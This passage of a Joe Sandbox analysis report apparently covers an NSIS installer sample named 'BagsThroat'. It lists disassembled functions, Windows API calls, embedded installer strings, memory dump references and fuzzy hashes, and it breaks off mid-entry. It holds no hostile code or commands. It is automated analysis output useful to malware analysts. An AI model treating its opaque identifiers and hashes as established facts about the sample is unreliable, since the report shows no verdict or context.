                                        • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 3581403547-1792361021
                                        • Opcode ID: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                        • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                        • Opcode Fuzzy Hash: a604443cd83b579b0b32d0796c641f38e9c13ff519544ce5bb934e0b76d77e16
                                        • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

                                        Control-flow Graph

                                        • Control-flow graph of function 406301 (rendered graph; Executed / Not Executed colouring and edge list omitted)
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: jF
                                        • API String ID: 2295610775-3349280890
                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: AddressHandleLibraryLoadModuleProc
                                        • String ID:
                                        • API String ID: 310444273-0
                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                        Control-flow Graph

                                        • Control-flow graph of function 4015a0 (rendered graph; Executed / Not Executed colouring and edge list omitted)
                                        APIs
                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                        • ShowWindow.USER32(?), ref: 00401753
                                        • ShowWindow.USER32(?), ref: 00401767
                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                        Strings
                                        • Rename failed: %s, xrefs: 0040194B
                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                        • Rename: %s, xrefs: 004018F8
                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                        • Aborting: "%s", xrefs: 0040161D
                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                        • Jump: %d, xrefs: 00401602
                                        • detailprint: %s, xrefs: 00401679
                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                        • Rename on reboot: %s, xrefs: 00401943
                                        • SetFileAttributes failed., xrefs: 004017A1
                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                        • BringToFront, xrefs: 004016BD
                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                        • Sleep(%d), xrefs: 0040169D
                                        • Call: %d, xrefs: 0040165A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                        • API String ID: 2872004960-3619442763
                                        • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                        • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                        • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                        • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                        Control-flow Graph

                                        • Control-flow graph of function 4054a5 (rendered graph; Executed / Not Executed colouring and edge list omitted)
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                        • ShowWindow.USER32(?), ref: 004054FE
                                        • DestroyWindow.USER32 ref: 00405512
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                        • EnableWindow.USER32(?,?), ref: 00405783
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 3282139019-0
                                        • Opcode ID: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                        • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                        • Opcode Fuzzy Hash: b5207720c177ba42d53edf7a9f1d4aab61830a891a9918718410ffa1281e69e3
                                        • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                        Control-flow Graph

                                        • Control-flow graph of function 405958 (rendered graph; Executed / Not Executed colouring and edge list omitted)
                                        APIs
                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                        • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                        • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                        • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                        • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                        • RegisterClassW.USER32(00476A40), ref: 00405B36
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                          • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                        • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                        • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                        • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                        • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                        • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                        • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                        • API String ID: 608394941-2746725676
                                        • Opcode ID: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                        • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                        • Opcode Fuzzy Hash: 5a0b6e3b933a3054d897ce2f46ec2622af961f7827b3640f610d27136e16ae8d
                                        • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • lstrcatW.KERNEL32(00000000,00000000,176,004D70B0,00000000,00000000), ref: 00401A76
                                        • CompareFileTime.KERNEL32(-00000014,?,176,176,00000000,00000000,176,004D70B0,00000000,00000000), ref: 00401AA0
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                          • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                          • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                          • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                          • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                        • String ID: 176$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                        • API String ID: 4286501637-885536709
                                        • Opcode ID: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                        • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                        • Opcode Fuzzy Hash: faafee0f47f33eb21a1c0678fb90d99184b49f87770aa7c48f9255c8b2a5202f
                                        • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                        Control-flow Graph (graph image not reproduced)
                                        • Function 004035B3, basic blocks 4035b3-4037f6. Blocks with API calls: 4035b3 GetTickCount, GetModuleFileNameW; 40360d GetFileSize; 40376b GlobalAlloc; 4037c0 SetFilePointer. Internal calls: 405e7c, 406035, 40677d, 4032d2, 403336, 403368, 40337f, 405e38, 4072ad.
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004035C4
                                        • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                          • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                          • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                        • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                        Strings
                                        • Null, xrefs: 004036AA
                                        • Error launching installer, xrefs: 00403603
                                        • Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author , xrefs: 004037F1
                                        • soft, xrefs: 004036A1
                                        • Inst, xrefs: 00403698
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                        • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                        • API String ID: 4283519449-527102705
                                        • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                        • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                        • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                        • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                        Control-flow Graph (graph image not reproduced)
                                        • Function 0040337F, basic blocks 40337f-4035b1. Blocks with API calls: 4033eb GetTickCount; 40348a GetTickCount; 4034af MulDiv, wsprintfW; 4034f3 WriteFile; 40358d WriteFile. Internal calls: 403336, 403368, 404f9e, 4076a0.
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 004033F1
                                        • GetTickCount.KERNEL32 ref: 00403492
                                        • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                        • wsprintfW.USER32 ref: 004034CE
                                        • WriteFile.KERNELBASE(00000000,00000000,00424579,00403792,00000000), ref: 004034FF
                                        • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: CountFileTickWrite$wsprintf
                                        • String ID: (]C$... %d%%$pAB$yEB
                                        • API String ID: 651206458-486274953
                                        • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                        • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                        • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                        • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                        Control-flow Graph (graph image not reproduced)
                                        • Function 00404F9E, basic blocks 404f9e-405070. Blocks with API calls: 404fd5 lstrlenW; 404fe3 lstrlenW; 404ff5 lstrcatW; 405004 SetWindowTextW; 405017 SendMessageW * 3. Internal calls: 406831.
                                        APIs
                                        • lstrlenW.KERNEL32(00445D80,00424579,759223A0,00000000), ref: 00404FD6
                                        • lstrlenW.KERNEL32(004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FE6
                                        • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424579,759223A0,00000000), ref: 00404FF9
                                        • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,759223A0,00000000), ref: 00406902
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2017467587.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2017446220.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017494788.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017548386.000000000049B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2017775507.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_BagsThroat.jbxd
                                        Similarity
                                        • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                        • String ID:
                                        • API String ID: 2740478559-0
                                        • Opcode ID: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                        • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                        • Opcode Fuzzy Hash: 51d76e94e87e2a175acad1467688f0f5260e520542c71dcf89a25dacb7e12f9e
                                        • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

                                        Control-flow Graph (graph image not reproduced)
                                        • Function 00402713, basic blocks 402713-40278c. Blocks with API calls: 402764 WritePrivateProfileStringW. Internal calls: 406035 * 2, 40145c * 4, 4062cf.
                                        APIs
                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                        Strings
                                        Memory Dump Source
